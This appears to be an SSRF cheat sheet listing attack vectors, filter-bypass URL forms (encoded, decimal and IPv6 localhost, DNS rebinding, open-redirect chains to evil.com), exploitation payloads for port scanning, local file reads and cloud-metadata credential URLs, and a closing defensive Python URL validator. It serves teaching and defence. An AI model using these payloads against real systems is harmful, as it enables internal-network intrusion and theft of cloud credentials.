🧠 Description

Server-side request forgery (SSRF) lets an attacker induce the server-side application to make HTTP requests to a destination of the attacker's choosing. This can lead to internal service access, cloud metadata compromise, and data exfiltration.

Attack Vectors:
  • URL parameters: ?url=http://internal.local
  • File fetching: /fetch?file=http://evil.com
  • Webhooks: callback_url parameter
  • PDF generation: Render URL as image

🛡️ Bypass Techniques

# Localhost variants
http://127.0.0.1
http://localhost
http://0

# IPv6
http://[::1]

# URL encoding
http://%31%32%37%2e%30%2e%30%2e%31

# Decimal IP
http://2130706433

# DNS rebinding
http://attacker.com#.127.0.0.1

# Open redirect chaining
http://trusted.com/redirect?url=http://evil.com

# Cloud metadata (AWS)
http://169.254.169.254/latest/meta-data/

💣 Exploitation Examples

# Port scanning internal
?url=http://192.168.1.1:22
?url=http://internal-db:3306

# File inclusion
?url=file:///etc/passwd
?url=file:///C:/Windows/win.ini

# Cloud metadata
# AWS
?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Google Cloud
?url=http://metadata.google.internal/computeMetadata/v1/
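
A defensive check for the URL forms listed above, as an added example (not from the original page): it canonicalises the host before judging it, so the localhost, IPv6, URL-encoded and decimal variants, `file://` and the metadata addresses are all rejected. `check_url`, `literal_ip`, the two resolvers and the `FAKE_DNS` answers are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit, unquote

# Constructed DNS answers so the example runs offline (not real lookups).
FAKE_DNS = {"localhost": ["127.0.0.1"], "attacker.com": ["93.184.216.34"],
            "metadata.google.internal": ["169.254.169.254"]}

def fake_resolve(host):
    return FAKE_DNS[host]  # KeyError for names without a constructed answer

def system_resolve(host):
    """Every address the name maps to, via the OS resolver."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]

def literal_ip(host):
    """Parse dotted, decimal, short, hex or IPv6 literals; None for names."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        # inet_aton also accepts "2130706433", "0" and "0x7f.1"
        return ipaddress.ip_address(socket.inet_aton(host))
    except (OSError, ValueError):
        return None

def check_url(url, resolve=system_resolve):
    """Return (allowed, detail) for a user-supplied fetch target."""
    try:
        parts = urlsplit(url)
        host = unquote(parts.hostname or "")  # %31%32%37... -> 127...
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https") or not host:
        return False, "scheme or host not allowed"
    ip = literal_ip(host)
    try:
        addrs = [ip] if ip is not None else [ipaddress.ip_address(a) for a in resolve(host)]
    except (OSError, ValueError, LookupError):
        return False, "cannot resolve host"
    # is_global is False for loopback, RFC 1918, link-local (169.254/16), 0.0.0.0
    bad = [str(a) for a in addrs if not a.is_global]
    if bad or not addrs:
        return False, "non-public address: " + ", ".join(bad)
    return True, [str(a) for a in addrs]

if __name__ == "__main__":
    for u in ("http://2130706433", "http://attacker.com#.127.0.0.1"):
        print(u, check_url(u, fake_resolve))
```

The check does not by itself cover open redirect chaining or DNS rebinding: fetch with redirects disabled (or re-check each hop) and connect to the addresses that were validated rather than resolving the name again.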